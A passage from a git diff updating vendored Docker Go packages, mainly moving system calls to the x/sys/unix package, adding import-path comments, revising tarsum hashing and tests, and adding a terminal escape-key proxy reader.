func Umask(newmask int) (oldmask int, err error) { - return syscall.Umask(newmask), nil + return unix.Umask(newmask), nil } diff --git a/vendor/github.com/docker/docker/pkg/system/umask_windows.go b/vendor/github.com/docker/docker/pkg/system/umask_windows.go index 13f1de1769..fc62388c38 100644 --- a/vendor/github.com/docker/docker/pkg/system/umask_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/umask_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" // Umask is not supported on the windows platform. func Umask(newmask int) (oldmask int, err error) { diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go index e2eac3b553..ed1b9fad59 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go @@ -1,20 +1,22 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" "unsafe" + + "golang.org/x/sys/unix" ) // LUtimesNano is used to change access and modification time of the specified path. -// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +// It's used for symbol link file because unix.UtimesNano doesn't support a NOFOLLOW flag atm. 
func LUtimesNano(path string, ts []syscall.Timespec) error { var _path *byte - _path, err := syscall.BytePtrFromString(path) + _path, err := unix.BytePtrFromString(path) if err != nil { return err } - if _, _, err := syscall.Syscall(syscall.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != syscall.ENOSYS { + if _, _, err := unix.Syscall(unix.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != unix.ENOSYS { return err } diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go index fc8a1aba95..0afe854589 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go @@ -1,24 +1,23 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" "unsafe" + + "golang.org/x/sys/unix" ) // LUtimesNano is used to change access and modification time of the specified path. -// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +// It's used for symbol link file because unix.UtimesNano doesn't support a NOFOLLOW flag atm. 
func LUtimesNano(path string, ts []syscall.Timespec) error { - // These are not currently available in syscall - atFdCwd := -100 - atSymLinkNoFollow := 0x100 + atFdCwd := unix.AT_FDCWD var _path *byte - _path, err := syscall.BytePtrFromString(path) + _path, err := unix.BytePtrFromString(path) if err != nil { return err } - - if _, _, err := syscall.Syscall6(syscall.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), uintptr(atSymLinkNoFollow), 0, 0); err != 0 && err != syscall.ENOSYS { + if _, _, err := unix.Syscall6(unix.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), unix.AT_SYMLINK_NOFOLLOW, 0, 0); err != 0 && err != unix.ENOSYS { return err } diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go index a73ed118c9..cc0e7cbf1f 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go index 139714544d..095e072e1d 100644 --- a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go @@ -1,6 +1,6 @@ // +build !linux,!freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import "syscall" diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go index d2e2c05799..66d4895b27 100644 --- a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go @@ -1,63 +1,29 @@ -package 
system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" - "unsafe" -) +import "golang.org/x/sys/unix" // Lgetxattr retrieves the value of the extended attribute identified by attr // and associated with the given path in the file system. // It will returns a nil slice and nil error if the xattr is not set. func Lgetxattr(path string, attr string) ([]byte, error) { - pathBytes, err := syscall.BytePtrFromString(path) - if err != nil { - return nil, err - } - attrBytes, err := syscall.BytePtrFromString(attr) - if err != nil { - return nil, err - } - dest := make([]byte, 128) - destBytes := unsafe.Pointer(&dest[0]) - sz, _, errno := syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) - if errno == syscall.ENODATA { + sz, errno := unix.Lgetxattr(path, attr, dest) + if errno == unix.ENODATA { return nil, nil } - if errno == syscall.ERANGE { + if errno == unix.ERANGE { dest = make([]byte, sz) - destBytes := unsafe.Pointer(&dest[0]) - sz, _, errno = syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) + sz, errno = unix.Lgetxattr(path, attr, dest) } - if errno != 0 { + if errno != nil { return nil, errno } return dest[:sz], nil } -var _zero uintptr - // Lsetxattr sets the value of the extended attribute identified by attr // and associated with the given path in the file system. 
func Lsetxattr(path string, attr string, data []byte, flags int) error { - pathBytes, err := syscall.BytePtrFromString(path) - if err != nil { - return err - } - attrBytes, err := syscall.BytePtrFromString(attr) - if err != nil { - return err - } - var dataBytes unsafe.Pointer - if len(data) > 0 { - dataBytes = unsafe.Pointer(&data[0]) - } else { - dataBytes = unsafe.Pointer(&_zero) - } - _, _, errno := syscall.Syscall6(syscall.SYS_LSETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(dataBytes), uintptr(len(data)), uintptr(flags), 0) - if errno != 0 { - return errno - } - return nil + return unix.Lsetxattr(path, attr, data, flags) } diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go index 0114f2227c..d780a90cd3 100644 --- a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package system +package system // import "github.com/docker/docker/pkg/system" // Lgetxattr is not supported on platforms other than linux. func Lgetxattr(path string, attr string) ([]byte, error) { diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go index 09eb393ab7..e835893746 100644 --- a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go @@ -1,6 +1,6 @@ // Package tailfile provides helper functions to read the nth lines of any // ReadSeeker. -package tailfile +package tailfile // import "github.com/docker/docker/pkg/tailfile" import ( "bytes" @@ -16,7 +16,7 @@ var eol = []byte("\n") // ErrNonPositiveLinesNumber is an error returned if the lines number was negative. 
var ErrNonPositiveLinesNumber = errors.New("The number of lines to extract from the file must be positive") -//TailFile returns last n lines of reader f (could be a fil). +//TailFile returns last n lines of reader f (could be a nil). func TailFile(f io.ReadSeeker, n int) ([][]byte, error) { if n <= 0 { return nil, ErrNonPositiveLinesNumber diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go index 31217c036c..c74bb02e16 100644 --- a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go @@ -1,4 +1,4 @@ -package tailfile +package tailfile // import "github.com/docker/docker/pkg/tailfile" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go index b42983e984..bc7d84df4e 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" // BuilderContext is an interface extending TarSum by adding the Remove method. 
// In general there was concern about adding this method to TarSum itself diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go index f54bf3a1bd..86adb442d6 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go index 5abf5e7ba3..01d4ed59b2 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go @@ -1,6 +1,10 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" -import "sort" +import ( + "runtime" + "sort" + "strings" +) // FileInfoSumInterface provides an interface for accessing file checksum // information within a tar file. This info is accessed through interface @@ -35,8 +39,11 @@ type FileInfoSums []FileInfoSumInterface // GetFile returns the first FileInfoSumInterface with a matching name. func (fis FileInfoSums) GetFile(name string) FileInfoSumInterface { + // We do case insensitive matching on Windows as c:\APP and c:\app are + // the same. See issue #33107. 
for i := range fis { - if fis[i].Name() == name { + if (runtime.GOOS == "windows" && strings.EqualFold(fis[i].Name(), name)) || + (runtime.GOOS != "windows" && fis[i].Name() == name) { return fis[i] } } diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go index bb700d8bde..e6ebd9cc86 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import "testing" @@ -46,7 +46,7 @@ func TestSortFileInfoSums(t *testing.T) { fis = newFileInfoSums() fis.SortByPos() if fis[0].Pos() != 0 { - t.Errorf("sorted fileInfoSums by Pos should order them by position.") + t.Error("sorted fileInfoSums by Pos should order them by position.") } fis = newFileInfoSums() @@ -56,7 +56,7 @@ func TestSortFileInfoSums(t *testing.T) { t.Errorf("Expected %q, got %q", expected, gotFileInfoSum) } if fis.GetFile("noPresent") != nil { - t.Errorf("Should have return nil if name not found.") + t.Error("Should have return nil if name not found.") } } diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go index 154788db82..5542e1b2c0 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go @@ -15,7 +15,7 @@ // constraining the ordering or manipulation of the files during the creation or // unpacking of the archive, nor include additional metadata state about the file // system attributes. 
-package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "archive/tar" @@ -160,6 +160,11 @@ func (sth simpleTHash) Hash() hash.Hash { return sth.h() } func (ts *tarSum) encodeHeader(h *tar.Header) error { for _, elem := range ts.headerSelector.selectHeaders(h) { + // Ignore these headers to be compatible with versions + // before go 1.10 + if elem[0] == "gname" || elem[0] == "uname" { + elem[1] = "" + } if _, err := ts.h.Write([]byte(elem[0] + elem[1])); err != nil { return err } @@ -219,6 +224,10 @@ func (ts *tarSum) Read(buf []byte) (int, error) { ts.first = false } + if _, err := ts.tarW.Write(buf2[:n]); err != nil { + return 0, err + } + currentHeader, err := ts.tarR.Next() if err != nil { if err == io.EOF { @@ -232,21 +241,19 @@ func (ts *tarSum) Read(buf []byte) (int, error) { return 0, err } ts.finished = true - return n, nil + return ts.bufWriter.Read(buf) } - return n, err + return 0, err } - ts.currentFile = path.Clean(currentHeader.Name) + + ts.currentFile = path.Join(".", path.Join("/", currentHeader.Name)) if err := ts.encodeHeader(currentHeader); err != nil { return 0, err } if err := ts.tarW.WriteHeader(currentHeader); err != nil { return 0, err } - if _, err := ts.tarW.Write(buf2[:n]); err != nil { - return 0, err - } - ts.tarW.Flush() + if _, err := io.Copy(ts.writer, ts.bufTar); err != nil { return 0, err } @@ -254,7 +261,7 @@ func (ts *tarSum) Read(buf []byte) (int, error) { return ts.bufWriter.Read(buf) } - return n, err + return 0, err } // Filling the hash buffer @@ -266,7 +273,6 @@ func (ts *tarSum) Read(buf []byte) (int, error) { if _, err = ts.tarW.Write(buf2[:n]); err != nil { return 0, err } - ts.tarW.Flush() // Filling the output writer if _, err = io.Copy(ts.writer, ts.bufTar); err != nil { diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go index 86df0e2b89..435b91c780 100644 --- 
a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "archive/tar" @@ -16,6 +16,9 @@ import ( "os" "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) type testLayer struct { @@ -66,19 +69,19 @@ var testLayers = []testLayer{ { // this tar has two files with the same path filename: "testdata/collision/collision-0.tar", - tarsum: "tarsum+sha256:08653904a68d3ab5c59e65ef58c49c1581caa3c34744f8d354b3f575ea04424a"}, + tarsum: "tarsum+sha256:7cabb5e9128bb4a93ff867b9464d7c66a644ae51ea2e90e6ef313f3bef93f077"}, { // this tar has the same two files (with the same path), but reversed order. ensuring is has different hash than above filename: "testdata/collision/collision-1.tar", - tarsum: "tarsum+sha256:b51c13fbefe158b5ce420d2b930eef54c5cd55c50a2ee4abdddea8fa9f081e0d"}, + tarsum: "tarsum+sha256:805fd393cfd58900b10c5636cf9bab48b2406d9b66523122f2352620c85dc7f9"}, { // this tar has newer of collider-0.tar, ensuring is has different hash filename: "testdata/collision/collision-2.tar", - tarsum: "tarsum+sha256:381547080919bb82691e995508ae20ed33ce0f6948d41cafbeb70ce20c73ee8e"}, + tarsum: "tarsum+sha256:85d2b8389f077659d78aca898f9e632ed9161f553f144aef100648eac540147b"}, { // this tar has newer of collider-1.tar, ensuring is has different hash filename: "testdata/collision/collision-3.tar", - tarsum: "tarsum+sha256:f886e431c08143164a676805205979cd8fa535dfcef714db5515650eea5a7c0f"}, + tarsum: "tarsum+sha256:cbe4dee79fe979d69c16c2bccd032e3205716a562f4a3c1ca1cbeed7b256eb19"}, { options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) tarsum: "tarsum+md5:0d7529ec7a8360155b48134b8e599f53", @@ -222,17 +225,13 @@ func TestNewTarSumForLabel(t *testing.T) { func TestEmptyTar(t *testing.T) { // Test without gzip. 
ts, err := emptyTarSum(false) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) zeroBlock := make([]byte, 1024) buf := new(bytes.Buffer) n, err := io.Copy(buf, ts) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), zeroBlock) { t.Fatalf("tarSum did not write the correct number of zeroed bytes: %d", n) @@ -247,19 +246,16 @@ func TestEmptyTar(t *testing.T) { // Test with gzip. ts, err = emptyTarSum(true) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) buf.Reset() - n, err = io.Copy(buf, ts) - if err != nil { - t.Fatal(err) - } + _, err = io.Copy(buf, ts) + assert.NilError(t, err) bufgz := new(bytes.Buffer) gz := gzip.NewWriter(bufgz) n, err = io.Copy(gz, bytes.NewBuffer(zeroBlock)) + assert.NilError(t, err) gz.Close() gzBytes := bufgz.Bytes() @@ -279,10 +275,7 @@ func TestEmptyTar(t *testing.T) { } resultSum = ts.Sum(nil) - - if resultSum != expectedSum { - t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) - } + assert.Check(t, is.Equal(expectedSum, resultSum)) } var ( @@ -443,7 +436,7 @@ func TestIteration(t *testing.T) { []byte(""), }, { - "tarsum.dev+sha256:b38166c059e11fb77bef30bf16fba7584446e80fcc156ff46d47e36c5305d8ef", + "tarsum.dev+sha256:862964db95e0fa7e42836ae4caab3576ab1df8d275720a45bdd01a5a3730cc63", VersionDev, &tar.Header{ Name: "another.txt", @@ -459,7 +452,7 @@ func TestIteration(t *testing.T) { []byte("test"), }, { - "tarsum.dev+sha256:4cc2e71ac5d31833ab2be9b4f7842a14ce595ec96a37af4ed08f87bc374228cd", + "tarsum.dev+sha256:4b1ba03544b49d96a32bacc77f8113220bd2f6a77e7e6d1e7b33cd87117d88e7", VersionDev, &tar.Header{ Name: "xattrs.txt", @@ -477,7 +470,7 @@ func TestIteration(t *testing.T) { []byte("test"), }, { - "tarsum.dev+sha256:65f4284fa32c0d4112dd93c3637697805866415b570587e4fd266af241503760", + "tarsum.dev+sha256:410b602c898bd4e82e800050f89848fc2cf20fd52aa59c1ce29df76b878b84a6", VersionDev, &tar.Header{ Name: "xattrs.txt", @@ -495,7 +488,7 
@@ func TestIteration(t *testing.T) { []byte("test"), }, { - "tarsum+sha256:c12bb6f1303a9ddbf4576c52da74973c00d14c109bcfa76b708d5da1154a07fa", + "tarsum+sha256:b1f97eab73abd7593c245e51070f9fbdb1824c6b00a0b7a3d7f0015cd05e9e86", Version0, &tar.Header{ Name: "xattrs.txt", diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go index 2882286854..aa1f171862 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go @@ -1,8 +1,9 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "archive/tar" "errors" + "io" "sort" "strconv" "strings" @@ -21,6 +22,13 @@ const ( VersionDev ) +// WriteV1Header writes a tar header to a writer in V1 tarsum format. +func WriteV1Header(h *tar.Header, w io.Writer) { + for _, elem := range v1TarHeaderSelect(h) { + w.Write([]byte(elem[0] + elem[1])) + } +} + // VersionLabelForChecksum returns the label for the given tarsum // checksum, i.e., everything before the first `+` character in // the string or an empty string if no label separator is found. 
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go index 88e0a5783c..79b9cc9107 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go index 9727ecde3e..c4c45a35e7 100644 --- a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go +++ b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go @@ -1,4 +1,4 @@ -package tarsum +package tarsum // import "github.com/docker/docker/pkg/tarsum" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/term/ascii.go b/vendor/github.com/docker/docker/pkg/term/ascii.go index f5262bccf5..87bca8d4ac 100644 --- a/vendor/github.com/docker/docker/pkg/term/ascii.go +++ b/vendor/github.com/docker/docker/pkg/term/ascii.go @@ -1,4 +1,4 @@ -package term +package term // import "github.com/docker/docker/pkg/term" import ( "fmt" @@ -59,7 +59,7 @@ next: return nil, fmt.Errorf("Unknown character: '%s'", key) } } else { - codes = append(codes, byte(key[0])) + codes = append(codes, key[0]) } } return codes, nil diff --git a/vendor/github.com/docker/docker/pkg/term/ascii_test.go b/vendor/github.com/docker/docker/pkg/term/ascii_test.go index 4a1e7f302c..665ab1552f 100644 --- a/vendor/github.com/docker/docker/pkg/term/ascii_test.go +++ b/vendor/github.com/docker/docker/pkg/term/ascii_test.go @@ -1,43 +1,25 @@ -package term +package term // import "github.com/docker/docker/pkg/term" -import "testing" +import ( + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) func TestToBytes(t *testing.T) { codes, err := ToBytes("ctrl-a,a") - if err != nil { - t.Fatal(err) - } - if len(codes) != 2 { - 
t.Fatalf("Expected 2 codes, got %d", len(codes)) - } - if codes[0] != 1 || codes[1] != 97 { - t.Fatalf("Expected '1' '97', got '%d' '%d'", codes[0], codes[1]) - } + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]byte{1, 97}, codes)) - codes, err = ToBytes("shift-z") - if err == nil { - t.Fatalf("Expected error, got none") - } + _, err = ToBytes("shift-z") + assert.Check(t, is.ErrorContains(err, "")) codes, err = ToBytes("ctrl-@,ctrl-[,~,ctrl-o") - if err != nil { - t.Fatal(err) - } - if len(codes) != 4 { - t.Fatalf("Expected 4 codes, got %d", len(codes)) - } - if codes[0] != 0 || codes[1] != 27 || codes[2] != 126 || codes[3] != 15 { - t.Fatalf("Expected '0' '27' '126', '15', got '%d' '%d' '%d' '%d'", codes[0], codes[1], codes[2], codes[3]) - } + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]byte{0, 27, 126, 15}, codes)) codes, err = ToBytes("DEL,+") - if err != nil { - t.Fatal(err) - } - if len(codes) != 2 { - t.Fatalf("Expected 2 codes, got %d", len(codes)) - } - if codes[0] != 127 || codes[1] != 43 { - t.Fatalf("Expected '127 '43'', got '%d' '%d'", codes[0], codes[1]) - } + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]byte{127, 43}, codes)) } diff --git a/vendor/github.com/docker/docker/pkg/term/proxy.go b/vendor/github.com/docker/docker/pkg/term/proxy.go new file mode 100644 index 0000000000..da733e5848 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/proxy.go @@ -0,0 +1,78 @@ +package term // import "github.com/docker/docker/pkg/term" + +import ( + "io" +) + +// EscapeError is special error which returned by a TTY proxy reader's Read() +// method in case its detach escape sequence is read. +type EscapeError struct{} + +func (EscapeError) Error() string { + return "read escape sequence" +} + +// escapeProxy is used only for attaches with a TTY. It is used to proxy +// stdin keypresses from the underlying reader and look for the passed in +// escape key sequence to signal a detach. 
+type escapeProxy struct { + escapeKeys []byte + escapeKeyPos int + r io.Reader +} + +// NewEscapeProxy returns a new TTY proxy reader which wraps the given reader +// and detects when the specified escape keys are read, in which case the Read +// method will return an error of type EscapeError. +func NewEscapeProxy(r io.Reader, escapeKeys []byte) io.Reader { + return &escapeProxy{ + escapeKeys: escapeKeys, + r: r, + } +} + +func (r *escapeProxy) Read(buf []byte) (int, error) { + nr, err := r.r.Read(buf) + + if len(r.escapeKeys) == 0 { + return nr, err + } + + preserve := func() { + // this preserves the original key presses in the passed in buffer + nr += r.escapeKeyPos + preserve := make([]byte, 0, r.escapeKeyPos+len(buf)) + preserve = append(preserve, r.escapeKeys[:r.escapeKeyPos]...) + preserve = append(preserve, buf...) + r.escapeKeyPos = 0 + copy(buf[0:nr], preserve) + } + + if nr != 1 || err != nil { + if r.escapeKeyPos > 0 { + preserve() + } + return nr, err + } + + if buf[0] != r.escapeKeys[r.escapeKeyPos] { + if r.escapeKeyPos > 0 { + preserve() + } + return nr, nil + } + + if r.escapeKeyPos == len(r.escapeKeys)-1 { + return 0, EscapeError{} + } + + // Looks like we've got an escape key, but we need to match again on the next + // read. + // Store the current escape key we found so we can look for the next one on + // the next read. 
+ // Since this is an escape key, make sure we don't let the caller read it + // If later on we find that this is not the escape sequence, we'll add the + // keys back + r.escapeKeyPos++ + return nr - r.escapeKeyPos, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/proxy_test.go b/vendor/github.com/docker/docker/pkg/term/proxy_test.go new file mode 100644 index 0000000000..df588fe15b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/proxy_test.go @@ -0,0 +1,115 @@ +package term // import "github.com/docker/docker/pkg/term" + +import ( + "bytes" + "fmt" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestEscapeProxyRead(t *testing.T) { + escapeKeys, _ := ToBytes("") + keys, _ := ToBytes("a") + reader := NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf := make([]byte, len(keys)) + nr, err := reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys))) + assert.DeepEqual(t, keys, buf) + + keys, _ = ToBytes("a,b,c") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys))) + assert.DeepEqual(t, keys, buf) + + keys, _ = ToBytes("") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.Assert(t, is.ErrorContains(err, ""), "Should throw error when no keys are to read") + assert.Equal(t, nr, 0, "nr should be zero") + assert.Check(t, is.Len(keys, 0)) + assert.Check(t, is.Len(buf, 0)) + + escapeKeys, _ = ToBytes("DEL") + keys, _ = ToBytes("a,b,c,+") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be 
equal to the number of %d", nr, len(keys))) + assert.DeepEqual(t, keys, buf) + + keys, _ = ToBytes("") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.Assert(t, is.ErrorContains(err, ""), "Should throw error when no keys are to read") + assert.Equal(t, nr, 0, "nr should be zero") + assert.Check(t, is.Len(keys, 0)) + assert.Check(t, is.Len(buf, 0)) + + escapeKeys, _ = ToBytes("ctrl-x,ctrl-@") + keys, _ = ToBytes("DEL") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 1, fmt.Sprintf("nr %d should be equal to the number of 1", nr)) + assert.DeepEqual(t, keys, buf) + + escapeKeys, _ = ToBytes("ctrl-c") + keys, _ = ToBytes("ctrl-c") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.Error(t, err, "read escape sequence") + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys, buf) + + escapeKeys, _ = ToBytes("ctrl-c,ctrl-z") + keys, _ = ToBytes("ctrl-c,ctrl-z") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, 1) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[0:1], buf) + nr, err = reader.Read(buf) + assert.Error(t, err, "read escape sequence") + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[1:], buf) + + escapeKeys, _ = ToBytes("ctrl-c,ctrl-z") + keys, _ = ToBytes("ctrl-c,DEL,+") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, 1) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[0:1], buf) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 
len(keys), fmt.Sprintf("nr should be equal to %d", len(keys))) + assert.DeepEqual(t, keys, buf) + + escapeKeys, _ = ToBytes("ctrl-c,ctrl-z") + keys, _ = ToBytes("ctrl-c,DEL") + reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys) + buf = make([]byte, 1) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, 0, "nr should be equal to 0") + assert.DeepEqual(t, keys[0:1], buf) + buf = make([]byte, len(keys)) + nr, err = reader.Read(buf) + assert.NilError(t, err) + assert.Equal(t, nr, len(keys), fmt.Sprintf("nr should be equal to %d", len(keys))) + assert.DeepEqual(t, keys, buf) +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc.go b/vendor/github.com/docker/docker/pkg/term/tc.go new file mode 100644 index 0000000000..01bcaa8abb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc.go @@ -0,0 +1,20 @@ +// +build !windows + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "syscall" + "unsafe" + + "golang.org/x/sys/unix" +) + +func tcget(fd uintptr, p *Termios) syscall.Errno { + _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p))) + return err +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p))) + return err +} diff --git 